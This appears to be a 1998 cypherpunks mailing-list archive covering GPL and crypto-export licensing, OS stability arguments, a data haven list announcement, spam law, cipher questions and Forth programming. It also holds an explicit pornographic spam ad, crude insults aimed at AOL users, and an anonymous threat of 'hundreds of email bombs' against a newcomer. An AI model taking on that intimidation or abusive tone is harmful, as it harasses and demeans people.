> From: RedRook <redrook@yahoo.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Please elaborate. Netscape works fine on Windows 98, and faces the
> same restrictions with installation that original Windows 95 had. 

No Netscape on NT or 95/98 is no where near as stable as on a Linux or
Solaris box (the two that I use most). I can't go 24 hours on my NT for
example without Netscape hanging for some mysterious reason whereas I've
run Netscape (even on my HP 10.10) for days without a hang and those
mysterious pauses it's so famous for.
 
> As for Java, Java works as well on Windows as on any other platform. 

Yep, that explains why my NT's have to be rebooted almost daily because of
various issues and my various unix boxes go for weeks....yep, that's more
stable all right.

> It's funny how giving the customers more value for their money, always
> ends up being anti-competative.

How do you figure Win98 gives me more value for my money? I buy Win98 for
$100 or so, have to have gobs of memory and a damned fast processor to even
come close to the alternate OS'es.

> network, that they can quickly add a jillion features to any program,

And just as many bugs.

> and make so much money off of it, that it's difficult for anyone but a
> multi-million dollar company to compete

Only becuase they intentionly go after the smaller companies and create
various issues (eg the DrDos intentional break) that nearly guarantee that
smaller firms are out before they even start.

> And no, taking the browser out of Windows is not going to change that.

You have a penchant for random wandering....


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 21:11:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (and vague ideas for additions) (fwd)
Message-ID: <199810010214.VAA16092@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 03:00:21 +0200
> From: Anonymous <nobody@replay.com>
> Subject: Re: propose: `cypherpunks license' (and vague ideas for additions)

> The GNU GPL discourages the sale of proprietary software by prohibiting
> anything using code covered by the license from being proprietary, and
> that's right.

It does not prevent GPL'ed code from using proprietary licenses, it only
prevents companies from using GPL'ed code without first obtaining a non-GPL
licence from the original author of the code (who should deservedly get a
cut of the cash).

> Both these licenses would be trying to promote their propagators' goals
> through restrictions on code re-use.

Re-use *without* prior permission of the author and copyright holder,
be accurate.

[other stuff deleated]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Twenty1CC@aol.com
Date: Wed, 30 Sep 1998 20:29:28 +0800
To: cypherpunks@Algebra.COM
Subject: What is AOL
Message-ID: <56d52044.3612da95@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Found in rec.homor.funny.reruns
>From rec.arts.sf.written, in a thread entitled "What is AOL?"
> An organization set up to give Internetters someone to make ethnic jokes
> about.
>
> --
> Arthur D. Hlavaty             hlavaty@panix.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Wed, 30 Sep 1998 16:45:52 +0800
To: Derek Atkins <cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <3612A767.94F23B58@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ahh, but it's not *you* who's putting the restrictions on your software,
but the U.S. government.  As far as I know (not that I'm a lawyer, or
anything) the U.S. govt. doesn't care what your license says --if it's
strong crypto, it's not supposed to be exported. 

The license is probably irrelevant, as far as import/export is
concerned.

Derek Atkins wrote:
> 
> The big issue I see with GPL and Crypto software is that with the GPL
> you cannot add any redistribution restrictions.  The problem is that
> due to the United States export rules, I cannot export Crypto
> software, which means I must legally put a restriction on any Crypto
> code I write.  But, this is a "further restriction" as far as the
> GPL is concerned.  This, in turn, means I cannot use the GPL for
> Crypto software.
> 
> -derek
> --
>        Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory
>        Member, MIT Student Information Processing Board  (SIPB)
>        URL: http://web.mit.edu/warlord/    PP-ASEL-IA     N1NWH
>        warlord@MIT.EDU                        PGP key available




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 21:51:49 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Data Haven mailing list is active again...
Message-ID: <199810010254.VAA16520@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Welcome to the Data Haven Mailing List

This list was originaly created by Douglas Floyd in order to focus
discussion and development on Data Haven technology. In late 1998 The
Armadillo Group took the list over since it was related to several current
lists that we support.

A data haven is a system that integrates cryptography, electronic funds
transfer, long term data storage, anonymous remailers, and usenet style news
mechanisms. The idea is that any two or more parties can participate in
providing services and information in an anonymous environment that supports
cryptographicly secured transactions. There are several architectures though
the only known operating data haven was Black Net. This was an experiment by
Tim May which examined the potential of anonymous transactions related to
sensitive information and potentialy illegal activities via usenet. It was
demonstrated successfuly.

If you would like to subscribe send majordomo@ssz.com a message with a blank
title and the body consisting of only:

subscribe dh-l

You should recieve a verification email and subsequent traffic. We hope to
provide a archive of the lists traffic, though there really hasn't been a
lot of it.

If you are interested in this sort of technology then consider subscribing
to one of the cypherpks CDR nodes as well as other more specialized lists.
The cypherpunks are focused on cryptography and its implimentation and
disimination, economic uses and impact of technology, and civil liberties.
It is a *VERY* high traffic international mailing list.

If you should have any problems please e-mail list@ssz.com for further help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 1 Oct 1998 00:31:43 +0800
To: Max Inux <business_ideas@usa.net
Subject: New California Spam Law is Bullshit
In-Reply-To: <199809301608.JAA07148@cyberpass.net>
Message-ID: <v03130301b238bcb67703@[209.133.20.6]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:43 PM -0700 9/30/98, Max Inux wrote:
>On Wed, 30 Sep 1998 2001files@usa.net wrote:
>
>Dear spammer,
>
>Nice threats are attached to this spam.  I love new ideas from the
>spamming community. Please be aware by not  including a real human email
>address (specifically stated) and a 1800 number to call to be removed,
>you are in violation of California law.

Think twice before citing this new law....

Whatever one thinks about unsolicited e-mail, the provisions of this new
California bill are frightening to any supporter of liberty.

* the requirement that mail have a "real" name attached to it runs afoul of
the right to anonymous messages, supported in various cases (Talley, for
example). A requirement that e-mail be identified is no different from a
requirement that pamphlets and articles have "real" names on them. So much
for the First Amendment.

(Oh, and the _commercial_ nature of UCE has nothing to do with the First
Amendment issues, unless one thinks the canonical First case, Sullivan, is
meaningless because the New York Times was "commercial speech.")

* think of the implications for anonymous messages, through remailers

* and where does the "must have a toll-free number" bullshit come from?
Think about it. It may sound _nice_ to demand that people have toll-free
numbers, but where is the constitutional support for such a taking?

And so on.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 22:09:43 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810010311.WAA16871@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 04:55:13 +0200
> From: Anonymous <nobody@replay.com>

> Why, if the ignition-controllers of cars are 
> CPUs, aren't cars theftproof without a 
> crypto-token?

Some cars now use a smart-key that is unique for each vehicle, though I'm
sure there are 'master keys'.

What a cool way to do rental cars.... insert your smart-card and it
activates and charges your account until reset by the rental agency on
return to a distributed system of drop-off points.

I noticed the other day we now have a washateria down on Guadalupe in the
old Antone's Club building that operates only by smart-card, no cash sign
right on the front door. There's a perfect application for something like
GNU/cash with a crypto/e$ module.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 30 Sep 1998 21:12:59 +0800
To: cypherpunks@cyberpass.net
Subject: Wire transfers from web page?
Message-ID: <Pine.LNX.3.95.980930220439.1025C-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




Does anyone know of any bank with software or a web page that lets you
give them wire-transfer instructions from over the internet?

How about a bank that lets you see where a wire transfer came from on the
web page interface?  I think dollarbank.com just says "incoming wire". 

How about a bank on the Internet that will accept instructions to write
and mail a check drawn on your account to any random person at any
address? 

Such things would make it really easy for random little guys to make
their own currency using e-commerce software.

  -- Vince


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Vincent Cate                           Offshore Information Services
 Vince@Offshore.com.ai                  http://www.offshore.com.ai/
 Anguilla, BWI                          http://www.offshore.com.ai/vince
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You have to take life as it happens, but you should try to make it
happen the way you want to take it.    - German Proverb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@earth.wazoo.com>
Date: Wed, 30 Sep 1998 17:24:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Navy investigating GSU computer hacker
In-Reply-To: <199809302133.OAA25787@netcom13.netcom.com>
Message-ID: <199809302226.WAA05846@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain



  > Someone used a Georgia Southern University writing and linguistics
  > department classroom computer to break into government files and
  > the U.S. Navy wants to know why.

  > [...]

  > "They ran a file transfer protocol program, which allows you to
  > download files and gain access to someone else's computer,"
  > Glacier said.

Ooooh, naughty, naughty!

"When FTP is outlawed, only outlaws will have FTP..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 1 Oct 1998 01:52:35 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A1928471C@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> No Netscape on NT or 95/98 is no where near as stable as 
> on a Linux or Solaris box (the two that I use most).

Correct me if I am wrong or if this has changed since they went
open-source, but AFAIK Mozilla's Windows and Unix codebases were
entirely independent and separately developed, so I'm not sure what
conclusions you can draw from that.

> Yep, that explains why my NT's have to be rebooted almost daily 
> because of various issues and my various unix boxes go for weeks

Again, let's leave the OS wars off this list. I've had NT machines up
for several months and down only for patches and upgrades.

But Netscape pissed me off so severely during the version 2.x plethora
of releases with their alpha-quality javascript that I've not used it
since, so I cannot comment on its current [in]stability.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 20 Oct 1998 23:29:20 +0800
To: cypherpunks@toad.com
Subject: could you help.....
Message-ID: <Pine.GSO.3.96.980930080348.29906A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain




I found this example in a book 

It's about Homophonic  substitution and 
I can't figure how they did it , I mean how the other letters where
substituted


Here's the example

Suppose the alphabet is mapped into the numbers 1  to 99 then

map E to 17,19,23,47,64
map A to 8,20,25,49
map R to 1,29,65
map T to 16,31,85
but otherwise the ith letter maps to the 3ith letter

Then the cleartext
MANY A SLIP TWIXT THE CUP AND THE LIP

will become

  08    20        16      3185  17      25    16  47
3608397220543324451666246931852117066045253909162147332445

My question is what/how did they represent the other letters like L (etc.)
coz I've tried to map them and yet I still can't understand
I even wrote A to Z then map them to 1 to 99, I still can't figure it out.

Could you also give me an example for polygram substitution.

Thank you very much.
SALAMAT PO.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fjaj732h@yahoo.com
Date: Tue, 15 Dec 1998 11:11:25 +0800
To: <cypherpunks@toad.com>
Subject: Re: I missed you!
Message-ID: <199812150214.SAA15932@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



<HTML><PRE><BODY BGCOLOR="#c0c0c0"></P><P ALIGN=CENTER><FONT COLOR="#8e060a"
SIZE=5><B>~~~HOT GIRLS LIVE~~~
</FONT><FONT COLOR="#000000" SIZE=3></B>
<FONT COLOR="#8e060a" SIZE=3><B><I>(</FONT><FONT COLOR="#000000" SIZE=3>Y<FONT
COLOR="#8e060a" SIZE=3>o</FONT><FONT COLOR="#000000" SIZE=3>u<FONT
COLOR="#8e060a" SIZE=3>r </FONT><FONT COLOR="#000000" SIZE=3>k<FONT
COLOR="#8e060a" SIZE=3>i</FONT><FONT COLOR="#000000" SIZE=3>n<FONT
COLOR="#8e060a" SIZE=3>d </FONT><FONT COLOR="#000000" SIZE=3>o<FONT
COLOR="#8e060a" SIZE=3>f </FONT><FONT COLOR="#000000" SIZE=3>S<FONT
COLOR="#8e060a" SIZE=3>e</FONT><FONT COLOR="#000000" SIZE=3>x <FONT
COLOR="#8e060a" SIZE=3>A</FONT><FONT COLOR="#000000" SIZE=3>w<FONT
COLOR="#8e060a" SIZE=3>a</FONT><FONT COLOR="#000000" SIZE=3>i<FONT
COLOR="#8e060a" SIZE=3>t</FONT><FONT COLOR="#000000" SIZE=3>s <FONT
COLOR="#8e060a" SIZE=3>Y</FONT><FONT COLOR="#000000" SIZE=3>o<FONT
COLOR="#8e060a" SIZE=3>u</FONT><FONT COLOR="#000000" SIZE=3>)</B></I>
<FONT COLOR="#000000" SIZE=4>
<FONT COLOR="#794e26" SIZE=4><B>Pick from the Variety of
Pleasure...</FONT><FONT COLOR="#000000" SIZE=3></B>
<FONT COLOR="#246851" SIZE=3><B>Amateur Sluts,</FONT><FONT COLOR="#000000"
SIZE=3> <FONT COLOR="#400040" SIZE=3>Hollywood Hookers</FONT><FONT
COLOR="#000000" SIZE=3>, <FONT COLOR="#400080" SIZE=3>Horny
Strippers</FONT><FONT COLOR="#000000" SIZE=3>, </B>
<FONT COLOR="#800040" SIZE=3><B>20 LIVE NUDE SEX SHOWS</FONT><FONT
COLOR="#000000" SIZE=3>,  <FONT COLOR="#004040" SIZE=3>HardCore Streaming
Videos</FONT><FONT COLOR="#000000" SIZE=3>,</B>
<FONT COLOR="#004080" SIZE=3><B>XXX Girl Girl Action</FONT><FONT
COLOR="#000000" SIZE=3>,  <FONT COLOR="#400040" SIZE=3>Adult Film Stars, and
YES 8,000 </FONT><FONT COLOR="#000000" SIZE=3>+ XXX Show All</B>
<B> Movies!</B>

CLICK HERE FOR ACCESS

<FONT COLOR="#800040" SIZE=3><B>"Rated #2 on the Net for the </FONT><FONT
COLOR="#000000" SIZE=3><I>Most and Best Variety <FONT COLOR="#800040"
SIZE=3></I>of Adult Entertainment!"</FONT><FONT COLOR="#000000" SIZE=3></B>
</PRE></HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 31 Aug 1998 18:57:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <c7693a9e572a7bcfbb185924c2817f9e@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Aug 1998, Clark, Beau (CLBM) wrote:

> 
> Remove
> 
> 

You've been hitting the super unleaded again, haven't you? I hope you
don't fart when around any open flames. You might blow everybody up.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Mon, 31 Aug 1998 15:35:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <67d557e1.35eb0495@aol.com>
Message-ID: <8ca082a3441e76fcc0f8029b292b425b@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Aug 1998 16:16:21 EDT  ILovToHack@aol.com wrote:

>Ibelive by spooks he ment goverment agents not a racial slur so lay off.

That's it!  The AOL'ers are grouping for a final stand against the sticker
location service (aka cypherpunks).  Time to jump ship!

UNSUBSKRIB <ILovtoHack@aol.com> <snicker> Yeah right!

GET ME OFF!


ThreeThree (toto's father)










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Sep 1998 00:02:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809010703.JAA12169@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this like flame baiting him? Personally I don't mind the comments :)

-----------

We don't take kindly to racial slurs here.  You'll probably be receiving
hundreds of email bombs over the next few days from angry
cypherpunks.  You may want to change email accounts.God bless!


At 08:19 PM 8/29/98 -0400, RyanFord@aol.com wrote:> hola and good
tidings 
>  send some info on spooks please >  i will be grateful> 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Tue, 1 Sep 1998 07:20:37 -0700 (PDT)
To: "Lars Weitze" <chromedemon@netcologne.de>
Subject: Re: Is it true that PGP 5.X is not secure?
In-Reply-To: <001001bdd5a0$b7cef800$7b0000c8@chrome>
Message-ID: <v03102801b211b1210b7a@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>There are still rumors about that...
>ChromeDemon
>- --
>"One dead is a tragedy, thousand deads are a statistic."
>        Karl Marx
>
>e-mail: chromedemon@netcologne.de
>http://chromedemon.home.pages.de
>http://www.netcologne.de/~nc-weitzela2
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 5.5.5
>
>iQA/AwUBNevU0XnCsKPabtOfEQILcACfZ097WlD1pyA+2c7qv5RcyuYQJaEAoOmf
>mvg3B9F9NNv7qrHljjgC1T+B
>=J/8j
>-----END PGP SIGNATURE-----

Why pay attention to ill-supported rumors? The source code is publicly
available at www.pgpi.com. If there is a security issue then it can be
critiqued with reference to the places in the source code that are the
cause of the problem. If someone has done this, I haven't been paying close
enough attention and I apologize for ranting. If not, then I would dismiss
such claims as almost certainly baseless.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Sep 1998 00:22:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is Hate Code Speech? YES
Message-ID: <199809010722.JAA14753@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


First off if she didn't like the code she could have quit.  Laws that
say a company has to change their internal practices to make the
workers happy are idiotic.  I can't sue because the men's bathroom
looks like crap and the wemans has a couch in it!  If the program code
was meant for distribution it might be a little different but still
you have the choice not to get that code.  The same as reading this
message a few lines in you could delete it!  You chose to read this
far.  The code is internal only and thus should require an internal
policy, not an outside law enforcement agency.  As far as speach: If
it wasn't a form of speech she would have not gotten offended.  She
was offended by the language in the source code and thus the speech.
get a job somewhere you feel comfortable, don't get a job and force
them to change things around you


---"Albert P. Franco, II" <apf2@apf2.com> wrote:
>
> >From: mcw@atreus.ncs.ncsc.mil
> >Subject: Is Hate Code Speech?
> >
> 
> 
> >I acknowledge that you're welcome to use whatever variable names you
> >want in code you write in private. BUt if you want to sell that
code, it
> >should be held to a standard of professionalism.
> >
> 
> I think it is interesting that people are speaking of  the program as
> something published for public consumption. Source code for commercial
> products rarely goes public and compilers do a rather nice job of
obscuring
> human language variable names. Thus if there is any message or
coherent
> agenda in the source code it is highly unlikely that it will be
detectable
> in the executable, which is in fact the product delivered to the
public.
> 
> Since the source code can only be read by insiders/employees then
this does
> tend to make it rather obvious that a form of speech was intended. I
won't
> rehash the fact that non-relevant, human-language-significant variable
> names (as opposed to x, y, i, & j) are generally unacceptable
programming
> practice. I would make two points; that in todays programming world
source
> code is protected by copyright law as are other forms of expression
legally
> considered speech and source code is intended to document the
process and
> as such communicate ideas--in a broad sense this is a decent
description of
> speech, a written mode of communicating ideas. 
> 
> If someone finds offensive (hate) material in an obscured text
(encrypted)
> intended for limited distribution, does the encryption make it less
> hateful? does the encryption make it any less a form of speech? does
the
> fact that distribution is limited (assumming the "target" is in the
> distribution class) make it any less offensive? Is a crime less
illegal if
> it is hidden? (Be careful, on this one...)
> 
> I think that offensive, probably hateful, speech was intended. So
the next
> step (or for others, a previous step) is to decide whether there are
legal
> grounds for action. There are several laws which do, in fact, make
these
> activities illegal. Most people in the US today agree that overt
racism is
> wrong. Additionally, most "Americans" agree with laws that make it
illegal
> to use/perform "hateful" speech. 
> 
> These are very dangerous laws since they try to tread a very thin line
> between the freedom of thoughts (and to some degree, actions) and
injury to
> others. When I first settled down to live in Spain and began to pay
real
> attention to the local political scene I was astonished to find people
> defending the "right" of the radicals to throw stones and metal
objects at
> those persons expressing ideas contrary to theirs (pro-peace,
> anti-terrorism demonstrations, 1995-6). Fortunately, we hear less
and less
> of this non-sense that physical harm to another is a valid form of
personal
> expression or speech. But the base problem lingers, where do we draw
the
> line of expression of ideas and intent to do harm. It has long been
held
> that shouting "fire" in a crowded building is not a protected form of
> speech. Nor is libel (forgetting for now the problems of defining or
> proving it). And where do we draw the line (or does it even matter?)
> between public and private? And where do expression and action get
> separated? Thinking about doing something, or telling some one about
those
> thoughts are not generally the same as actually doing it. But where
does
> thought become expression become action?
> 
> This case doesn't solely revolve around the speech issue...IMO, it
also
> revolves around the public/private issue, and whether or not the
government
> can rightfully "enter" a "private" business place to regulate these
> matters. Recent history (80 years or so...) shows an increasing
tendency
> for the government to "protect" workers by regulating the workplace.
There
> are health & safety regs, minimum wage regs, etc. The "American"
populace
> has in general supported (and at times demanded) these external
limits on
> the "private" employer/employee relationship. Legal precedent exists.
> 
> There are two problems here and historically the government has been
called
> upon to keep a balance between "free speech" and "harmful speech" on
the
> one hand and "Privacy" and "Protection" on the other hand. The
debate now
> is with this case which way will (should?) the pendulum swing? More
> protection (reduction of privacy), more freedom (or hateful
speech)... 
> 
> Personally, I hope no one wins this eternal debate 100% since the
results
> would be disastrous.
> 
> Just some thoughts...
> 
> Albert P. Franco, II
> encryption@apf2.com
> 
> 

==

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 1 Sep 1998 08:34:25 -0700 (PDT)
To: sjmz@hplb.hpl.hp.com
Subject: Threaded code's place
Message-ID: <35EC12E4.1B6C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 9/1/98 9:00 AM

Alexander Wolfe

I spoke to Richard Hanson yesterday afternoon.

He got the e-mail referencing

http://www.eet.com/news/98/1024news/java.html

I wrote the attached WEED KILLER addition for an SBIR proposal submitted
by several profs at Texas A&M and a Sandia physicist.

Threaded code can 'save-the-day' on some types of projects but doesn't
work very well on others.  I wrote in the preface of my 8051 forth book

 FORTH is applicable to hardware intensive projects        
 implemented by one, two, or three workers.  Robots,        
 computer numerical controlled machines, weapons        
 programmers, cryptographic processors, engine        
 controllers, unmanned observatories, computer hardware        
 debuggers, laser printer graphics controllers, video        
 games, work station device drivers, writing BASICs are        
 all candidates for FORTH software technology.  FORTH is        
 a one of the top choices for embedded controller        
 applications.       

AFTER publication of my SANDIA-APPROVED BOOK, I learned FROM NSA

1  the former ussr uses Forth to fuze it weapons systems
2  builds a military version of the 8051.

Oh dear.

/http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2  

http://www.oreilly.com/catalog/javavm/ gives the definition of the
Java verbs.

Charles Moore, Forth's inventor, is writing the ShBoom Java compiler
http://www.ptsc.com/

The green machine at http://www.metriguard.com/HCLT.HTM runs using the
Forth from my book.

Since I was fired I have been doing mostly MASM and Visual Basic
programming.

This is good for me since I gives me a different perspective from
standalone
Forth and Forth assembler which I did at Sandia.

Visual Basic is more like Fortran than traditional basics.

                      Implementing Basics : How Basics Work 
                 William H. and Patricia Payne / Published 1982 
http://www.amazon.com

Your article on Java and its future was VERY INFORMATIVE.

I SPECULATE that Java will see about the same success as Forth.

I am working on completion of the digital FX Model 2600FX Ultrasonic
Veneer Tester
http://www.metriguard.com/METPROD.HTM which uses a 80C32 micrcontroller
interfacing
to a Windows PC though an ieee 1284 ecp port.

The 80C32 software is written in Forth and Forth assembler.  The Windows
since is 
written in Visual Basic and MASM Windows dlls.

Forth on the 80C32 is a NATURAL.  One the PC side Forth is not suitable
- except for
interactive exploring super i/o chips. 
http://www.smsc.com/main/datasheet.html 

Loring Wirbel WROTE SCATHING articles about NSA when Girish Mahtre was
editor of EET.
But since CMP took over, Loring's articles have been more subdued.

This is the reason I sent Wirbel a copy of my offending tech report. 
http://jya.com/da/whpda.htm

Loring has been superhelpful to see that I am not buried in the Great
Satan's invisible
cemetery. And in one article wrote the paragraph

  Next in my in-basket was a set of reprints from the Baltimore Sun from
the paper's NSA series,   which ran in early December. The series
reveals the setup by the NSA and CIA of a new covert    collection
agency, the Special Collection Service, and details the case of Hans
Buehler, an     employee of Crypto A.G. who was thrown into an Iranian
prison after getting snared in a         Crypto/NSA sting against that
country.  http://www.jya.com/whp1.htm

which was read by Iranian engineers.

A week ago I mailed a copy of the Swiss Radio International tape to
http://www.qainfo.se/~lb/crypto_ag.htm

Lazlo Baranyi plans to post the audio plus translations of the German at
his web site, Baranyi wrote me.

I want settlement, my money and out of this crypto mess.  

Loring Wirbel and EET has been a GREAT HELP. Along with other
journalists, including Pulitzer Prize-winner Tamar Stieber, too.

bill payne


         	WEED KILLER computer interface proposal section 7/27/98 10:11 AM

Solution to controlling and collecting data from the WEED KILLER involves interfacing a personal computer
running a version of the Windows operating system to the WEED KILLER analog/digital hardware.

Windows is not a real-time operating system, therefore  microcontroller controller/collector hardware 
interface must be installed between a Wintel PC and the WEED KILLER hardware.

Essence of the Wintel data collector problem is that Windows 3.x or 9x responds to a hardware interrupt
usually between 70 to 150 microseconds.  In rare occasions the interrupt latency may extend to 1.5 
milliseconds or even longer.  A microcontroller responds to an interrupt in several microseconds.

Wintel hardware controller interface is even more difficult than collection for the reason that the Windows 
operating system only gives control to an application when Windows decides.  In the collection, mode at
least a hardware interrupt signals Windows that the application wants control.  However, the microcontroller
can send the Wintel an interrupt asking the applications code whether there is any message it needs to
send the microcontroller.

Microcontrollers have specialized timers, serial expansion ports and are, therefore, designed to be interfaced to 
analog and digital hardware. 

An 80C32 family microcontroller is proposed for the WEED KILLER application for reasons.

1  The 80C32 will do the job.

2  Multiple vendors of 80C32 guarantee future supply at a competitive price.  Current suppliers include
 Intel, AMD, Winbond, Dallas, Philips, Siemens, OKI,  ATMEL, ... 

3  High-speed parallel port bi-directional IEEE 1284 enhanced capability port 9 (ecp) communications 
hardware between an 80C32 and PC is in the final stage of development.

4  IEEE 1284 hardware drivers are supplied with Windows NT.  Custom assembler dll drivers are available
for 9x and 3.x.

5  A public-domain Forth 8051 operating system hosting a high-level language and interactive assembler with 
complete source code documentation is available on Internet. http://jya.com/f86/whpf86.htm

Hardcover book further documenting 5 is available from Academic Press.
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Only a Wintel machine is required for both hardware and software for the WEED KILLER project.  

Usually a Forth hardware/software development probject on requres a voltmeter, logic probe, and, 
infrequently, an oscilloscope.  Reason  is the INTERACTIVE control of the hardware and software
from a PC keyboard and diagnostic information easily printed to a PC monitor.

Justification for assertion made in the above paragraph comes from Internet.

NASA uses Forth extensively for its space programs. http://groucho.gsfc.nasa.gov/forth/

Ballard used polyForth http://av.yahoo.com/bin/query?p=polyforth&z=2&hc=0&hs=0
to locate wrecks of the Titanic, Bismarck, and Yorktown.
http://www.nationalgeographic.com/features/98/midway

Sun Microsystems workstation boot into Forth then invokes Solaris. http://playground.sun.com/pub/1275/

Adobe Postscript is a version of Forth. 
http://www.mactech.com/articles/mactech/language/forth-postscript.html

Video game software are written mostly in Forth.

The Wintel side of the WEED KILLER project will be most-likely written in a small
amount of assembler interface code and Visual Basic.

While Forth threaded code software technology is extremely valuable in some settings,
it is not in others.

Java is a variation of Forth.  http://www.mrl.nyu.edu/meyer/jvmref/

Future of Java on Wintel machines is unclear at this time.

For example,

